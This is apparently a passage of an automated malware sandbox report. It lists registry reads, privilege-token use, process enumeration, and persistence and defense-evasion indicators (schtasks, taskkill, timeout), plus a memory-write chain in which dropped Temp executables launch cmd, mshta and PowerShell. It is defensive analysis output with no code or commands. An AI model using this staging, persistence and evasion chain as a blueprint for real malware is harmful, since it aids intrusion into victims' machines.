Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\nrwu\epug.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108990101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2020 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe
PID 2020 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe
PID 2020 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe
PID 1956 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1956 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1956 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2232 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
PID 2232 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
PID 2232 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2232 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 4040 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 4124 wrote to memory of 2408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4124 wrote to memory of 2408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2232 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2232 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 752 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 752 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 752 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2232 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe
PID 2232 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe
PID 2232 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe
PID 1636 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe C:\Windows\SysWOW64\cmd.exe
PID 1636 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe C:\Windows\SysWOW64\cmd.exe
PID 1636 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe C:\Windows\SysWOW64\cmd.exe
PID 1636 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe C:\Windows\SysWOW64\mshta.exe
PID 1636 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe C:\Windows\SysWOW64\mshta.exe
PID 1636 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe C:\Windows\SysWOW64\mshta.exe
PID 4592 wrote to memory of 4184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4592 wrote to memory of 4184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4592 wrote to memory of 4184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4284 wrote to memory of 2500 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
